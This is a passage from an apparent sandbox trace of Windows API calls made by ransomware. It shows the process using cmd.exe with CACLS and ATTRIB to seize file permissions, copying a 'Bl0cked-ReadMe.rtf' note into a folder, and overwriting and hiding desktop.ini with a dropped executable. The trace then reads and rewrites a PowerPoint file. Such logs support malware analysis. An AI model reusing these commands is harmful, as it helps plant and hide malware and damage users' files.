(hObject=0x1b4) returned 1 [0234.216] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0234.216] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0234.216] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 2 [0234.216] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.216] ReleaseMutex (hMutex=0xf8) returned 1 [0234.216] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.216] ReleaseMutex (hMutex=0xf8) returned 1 [0234.216] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.216] ReleaseMutex (hMutex=0xf8) returned 1 [0234.216] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.217] ReleaseMutex (hMutex=0xf8) returned 1 [0234.217] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0234.219] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.219] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.219] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.219] CloseHandle (hObject=0x1b4) returned 1 [0234.219] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0234.219] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0234.219] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss\"", lpProcessInformation=0x12fba4*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x828, dwThreadId=0x140)) returned 1 [0234.239] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0235.605] CloseHandle (hObject=0x120) returned 1 [0235.605] CloseHandle (hObject=0x1b4) returned 1 [0235.605] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0235.605] ReleaseMutex (hMutex=0xf8) returned 1 [0235.605] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0235.605] ReleaseMutex (hMutex=0xf8) returned 1 [0235.605] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0235.605] ReleaseMutex (hMutex=0xf8) returned 1 [0235.605] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0235.605] ReleaseMutex (hMutex=0xf8) returned 1 [0235.605] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0235.605] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0235.605] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0235.606] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0235.606] CloseHandle (hObject=0x1b4) returned 1 [0235.606] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\", cchLength=0x25 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\") returned 0x25 [0235.606] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0235.606] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\", cchCount1=37, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 3 [0235.606] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\", cchLength=0x25 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\") returned 0x25 [0235.606] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0235.606] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\", cchCount1=37, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0235.606] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0235.606] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0235.606] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0235.606] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\") returned 0x23 [0235.607] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0235.607] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0235.607] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xaac, dwThreadId=0xc00)) returned 1 [0235.625] CloseHandle (hObject=0x120) returned 1 [0235.625] CloseHandle (hObject=0x1b4) returned 1 [0235.625] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\bl0cked-readme.rtf")) returned 0xffffffff [0235.625] GetLastError () returned 0x2 [0235.625] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0235.628] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\my shapes\\bl0cked-readme.rtf")) returned 0x20 [0235.628] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0235.628] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0235.628] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0235.629] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0235.629] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0235.629] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0235.629] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0235.629] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\My Shapes\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\") returned 0x23 [0235.629] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0235.629] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0235.629] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\My Shapes", lpszShortPath=0x123fd6c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1") returned 0x22 [0235.630] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x146 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\MYSHAP~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\MYSHAP~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\MYSHAP~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\MYSHAP~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x146 [0235.630] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0235.630] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"", lpProcessInformation=0x12fb78*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa40, dwThreadId=0x600)) returned 1 [0235.636] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0236.573] CloseHandle (hObject=0x1b4) returned 1 [0236.574] CloseHandle (hObject=0x120) returned 1 [0236.574] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0236.574] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\My Shapes", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0236.574] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0236.574] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.574] ReleaseMutex (hMutex=0xf8) returned 1 [0236.574] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.574] ReleaseMutex (hMutex=0xf8) returned 1 [0236.574] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.574] ReleaseMutex (hMutex=0xf8) returned 1 [0236.574] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.574] ReleaseMutex (hMutex=0xf8) returned 1 [0236.574] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ngdm.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ngdm.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0236.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.574] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29336366225) returned 1 [0236.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.576] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.576] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.576] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.576] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.576] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xf3ca [0236.576] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xf8b2 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xf8b2 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0236.577] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7c58, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7c58, lpOverlapped=0x0) returned 1 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0236.577] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7c58, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7c58, lpOverlapped=0x0) returned 1 [0236.578] SetFilePointer (in: hFile=0x120, lDistanceToMove=-31832, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7c5a [0236.578] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7c58, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7c58, lpOverlapped=0x0) returned 1 [0236.578] SetFilePointer (in: hFile=0x120, lDistanceToMove=-31832, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: 